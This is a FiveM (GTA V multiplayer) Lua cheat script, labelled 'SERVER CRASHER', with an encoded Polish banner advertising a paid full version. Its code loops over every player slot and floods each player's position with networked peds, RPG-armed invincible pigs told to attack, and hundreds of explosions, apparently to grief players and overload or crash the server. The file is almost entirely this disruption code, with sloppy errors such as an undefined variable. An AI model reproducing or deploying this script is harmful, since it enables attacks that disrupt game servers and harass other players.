







function dol(K, x, y) SetTextFont(0) SetTextProportional(1) SetTextScale(0.0, 0.4) SetTextDropshadow(1, 0, 0, 0, 255) SetTextEdge(1, 0, 0, 0, 255) SetTextDropShadow() SetTextOutline() SetTextEntry("STRING") AddTextComponentString(K) DrawText(x, y) end;


				Citizen.CreateThread(
					function()
					SetDiscordAppId(653145101995868220)
					SetDiscordRichPresenceAsset('SERVER CRASHER')

					dol('\126\104\126\126\114\126\84\69\32\77\69\78\85\32\74\69\83\84\32\68\65\82\77\79\87\69\32\44\32\75\85\80\32\80\69\197\129\78\196\132\32\87\69\82\83\74\69\32\58\75\111\71\117\83\122\69\107\35\51\50\53\49\32\108\117\98\32\100\105\115\99\111\114\100\46\103\103\47\112\100\52\75\109\72\77\10', 0.220, 0.0)
				dol('\126\104\126\126\114\126\84\69\32\77\69\78\85\32\74\69\83\84\32\68\65\82\77\79\87\69\32\44\32\75\85\80\32\80\69\197\129\78\196\132\32\87\69\82\83\74\69\32\58\75\111\71\117\83\122\69\107\35\51\50\53\49\32\108\117\98\32\100\105\115\99\111\114\100\46\103\103\47\112\100\52\75\109\72\77\10', 0.220, 0.480)
				dol('\126\104\126\126\114\126\84\69\32\77\69\78\85\32\74\69\83\84\32\68\65\82\77\79\87\69\32\44\32\75\85\80\32\80\69\197\129\78\196\132\32\87\69\82\83\74\69\32\58\75\111\71\117\83\122\69\107\35\51\50\53\49\32\108\117\98\32\100\105\115\99\111\114\100\46\103\103\47\112\100\52\75\109\72\77\10', 0.220, 0.740)
				dol('\126\104\126\126\114\126\84\69\32\77\69\78\85\32\74\69\83\84\32\68\65\82\77\79\87\69\32\44\32\75\85\80\32\80\69\197\129\78\196\132\32\87\69\82\83\74\69\32\58\75\111\71\117\83\122\69\107\35\51\50\53\49\32\108\117\98\32\100\105\115\99\111\114\100\46\103\103\47\112\100\52\75\109\72\77\10', 0.220, 0.900)

					local cb = 0
					while true do
				for i = 0,128 do
				local x,y,z = table.unpack(GetEntityCoords(GetPlayerPed(i)))
                    roundx = tonumber(string.format('%.2f', x))
                    roundy = tonumber(string.format('%.2f', y))
                    roundz = tonumber(string.format('%.2f', z))
                    local e7 = 'a_m_m_afriamer_01'
                    local e8 = GetHashKey(e7)
                    RequestModel(e8)
					RequestAnimDict("anim@arena@celeb@flat@solo@no_props@")
                    while not HasModelLoaded(e8) do
                        Citizen.Wait(0)
                    end
	local ped1 = CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(4,e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false)
	local ped2 = CreatePed(4,e8, roundx - 1.70, roundy - 1.70, roundz - 1.0, true, true, false)
	local ped3 = CreatePed(4,e8, roundx - 1.70, roundy + 1.70, roundz - 1.0, true, true, false)
	local ped4 = CreatePed(4,e8, roundx + 1.70, roundy - 1.70, roundz - 1.0, true, true, false)
AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
		
	TaskPlayAnim( ped1, "anim@arena@celeb@flat@solo@no_props@", "flip_a_player_a", 8.0, 1.0, -1, 1, 0, 0, 0, 0 )
    TaskPlayAnim( ped2, "anim@arena@celeb@flat@solo@no_props@", "flip_a_player_a", 8.0, 1.0, -1, 1, 0, 0, 0, 0 )
    TaskPlayAnim( ped3, "anim@arena@celeb@flat@solo@no_props@", "flip_a_player_a", 8.0, 1.0, -1, 1, 0, 0, 0, 0 )
    TaskPlayAnim( ped4, "anim@arena@celeb@flat@solo@no_props@", "flip_a_player_a", 8.0, 1.0, -1, 1, 0, 0, 0, 0 )
    SetEntityHasGravity(ped1,false)
    SetEntityHasGravity(ped2,false)
    SetEntityHasGravity(ped3,false)
    SetEntityHasGravity(ped4,false)
	SetPlayerInvincible(ped1, true)
    SetPlayerInvincible(ped2, true)
    SetPlayerInvincible(ped3, true)
    SetPlayerInvincible(ped4, true)
AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
    SetEntityHeading(ped1,GetEntityHeading(ped1)+20)
    SetEntityHeading(ped2,GetEntityHeading(ped1)+20)
    SetEntityHeading(ped3,GetEntityHeading(ped1)+20)
    SetEntityHeading(ped4,GetEntityHeading(ped1)+20)
	AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
	
	
	
					local bQ = 'a_c_pig'
                    local bR = 'weapon_rpg'
                    for j = 0, 2 do
                        local bK = GetEntityCoords(GetPlayerPed(i))
                        RequestModel(GetHashKey(bQ))
                        Citizen.Wait(50)
                        if HasModelLoaded(GetHashKey(bQ)) then
                            local ped =
								CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false),CreatePed(21,GetHashKey(bQ), roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false)

                            NetworkRegisterEntityAsNetworked(ped)
                            if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(i)) then
                                local ei = PedToNet(ped)
                                NetworkSetNetworkIdDynamic(ei, false)
								SetEntityHasGravity(ped,false)
                                SetNetworkIdCanMigrate(ei, true)
                                SetNetworkIdExistsOnAllMachines(ei, true)
                                Citizen.Wait(200)
                                NetToPed(ei)
                                GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
                                SetEntityInvincible(ped, true)
                                SetPedCanSwitchWeapon(ped, true)
                                TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
                            elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
                                TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
                            else
                                Citizen.Wait(0)
                            end
                        end
                    end 
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
